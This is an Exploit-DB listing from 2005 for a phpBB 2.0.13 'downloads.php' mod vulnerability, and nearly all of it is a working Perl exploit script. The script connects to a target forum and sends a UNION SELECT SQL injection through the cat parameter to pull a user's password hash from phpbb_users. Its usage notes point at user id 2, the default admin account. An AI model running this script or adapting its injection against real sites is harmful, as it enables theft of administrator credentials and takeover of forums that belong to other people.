phpBB <= 2.0.13 - 'downloads.php' mod Remote Exploit

2005-04-02T00:00:00
ID EDB-ID:907
Type exploitdb
Reporter CereBrums
Modified 2005-04-02T00:00:00

Description

phpBB <= 2.0.13 - 'downloads.php' mod Remote Exploit. Webapps exploit for php platform

                                        
                                            #!/usr/bin/perl -w
use IO::Socket;

##    Example:
##    C:\&gt;phpbb.pl www.site.com /phpBB2/ 2
##
##     downloads.php mod in phpBB &lt;= 2.0.13
##     **********************************
##      [~] Connecting...
##      [+] Connected!
##      [~] Sending Data...
##      [~] Data Sent, Waiting for response...
##      [+] MD5 Hash for user with id=2 is: 81dc9bdb52d04dc20036dbd8313ed055
##
if (@ARGV &lt; 3)
{
print "\n\n";
print "|****************************************************************|\n";
print " phpBB &lt;=2.0.13 'downloads.php' Mod\n";
print " Bug found by Axl And CereBrums\n";
print " Coded by CereBrums // 2/4/2005\n";
print " Usage: phpbb.pl &lt;site&gt; &lt;folder&gt; &lt;user_id&gt;\n";
print " e.g.: phpbb.pl www.site.com /phpBB2/ 2 \n";
print " [~] &lt;server&gt; - site address\n";
print " [~] &lt;folder&gt; - forum folder\n";
print " [~] &lt;user_id&gt; - user id (2 default for phpBB admin)\n";
print "|****************************************************************|\n";
print "\n\n";
exit(1);
}

$take = 0;
$success = 0;
$server = $ARGV[0];
$folder = $ARGV[1];
$user_id = $ARGV[2];
print "\n downloads.php mod in phpBB &lt;= 2.0.13\n";
print " **********************************\n";
print "  [~] Connecting...\n";
$socket = IO::Socket::INET-&gt;new(
Proto =&gt; "tcp",
PeerAddr =&gt; "$server",
PeerPort =&gt; "80") || die "$socket error $!";

print "  [+] Connected\n";
print "  [~] Sending Data...\n";

$path = "http://$server/";
$path .= "/$folder/";
$path .= "downloads.php?cat=-1%20UNION%20SELECT%200,user_password,0,0,0,0,0,0,0%20FROM%20phpbb_users%20WHERE%20user_id=$user_id/*";
print $socket "GET $path HTTP/1.0\r\n\r\n";

print "  [~] Data Sent, Waiting for response...\n";

while ($answer = &lt;$socket&gt;)
{
       if ($take == 1) {
               $pass = substr($answer,51,32);
               print "  [+] MD5 Hash for user with id=$user_id is: $pass\n";
               $success = 1;
               $take = 0;
       }
       $found = rindex ($answer,"downloads.php?view=detail&id=0&cat=0");
       if ( $found &gt; -1 ) {
               $take = 1;
       }
}
if ($success==0) {print "  [-] Exploit failed\n";}

## EOF ##

# milw0rm.com [2005-04-02]